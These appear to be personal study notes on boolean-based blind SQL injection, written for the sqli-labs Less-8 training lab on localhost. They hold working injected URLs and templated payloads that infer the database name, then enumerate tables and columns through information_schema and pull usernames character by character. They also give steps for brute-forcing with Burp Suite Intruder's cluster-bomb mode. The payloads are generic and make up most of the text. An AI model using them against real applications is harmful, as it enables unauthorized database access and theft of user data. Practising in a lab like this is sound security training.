--------------
basic (substr)
--------------

SUBSTR(input_string, starting_position, length)

SELECT SUBSTR('Hello, World!', 1, 2); -- Output: 'He'
SELECT SUBSTR('Hello, World!', 3, 3); -- Output: 'llo'
SELECT SUBSTR('Hello, World!', -4); -- Output: 'rld!'


-------------
basic (limit)
-------------

limit 0,1

The 0 in the LIMIT clause represents the starting record, and the 1 represents the number of records to retrieve.(row/col)

-------------
Finding error
-------------
http://localhost/sqli/Less-8/?id=1'

true means show data properly
false mean hiding data

-------
Fixing 
-------
http://localhost/sqli/Less-8/?id=1' AND 1--+   ---> true
http://localhost/sqli/Less-8/?id=1' AND 0--+   ---> false

--------------------------------
Determinig database name length
--------------------------------

http://localhost/sqli/Less-8/?id=1' AND (select(length(database()))) >= 8--+  ----> true

-----------------------------------------
Determinig database name using bruteforce
-----------------------------------------

http://localhost/sqli/Less-8/?id=1' AND (select substr(database(),1,1)) = 's'--+

---------------------------------------------------
Enumerating through burpsuite intuder (cluter bomb)
---------------------------------------------------

1. intersect the proxy and send this to intuder
2. select attack type cluster bomd
3. select two parameter (one is  substr(database(),$1$ ,1)), and second is  '$s$'.
4.from payload section, select 1 as number(length)
5.select 2 as bruteforcer  (min and max length 1)
6. atack
7. then sort according to legth

payloads

http://localhost/sqli/Less-8/?id=1' AND (select substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 'e'--+

http://localhost/sqli/Less-8/?id=1' AND (select substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))= 'i' --+
substr((select column_name from information_schema.columns where table_name='users' limit 1,1),3,1)= 'e'



																--------
																payloads
																--------
																

--------------
finding tables
--------------
AND (SELECT substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),number,1)) = 'bruteforcer' --+

---------------
finding columns
---------------
AND (SELECT substr((select column_name from information_schema.columns where table_name='users' limit 0,1),number,1))= 'bruteforcer' --+

--------------
retriving data
--------------

AND (SELECT substr((select username from users limit 0,1),number,1))= 'bruteforcer' --+
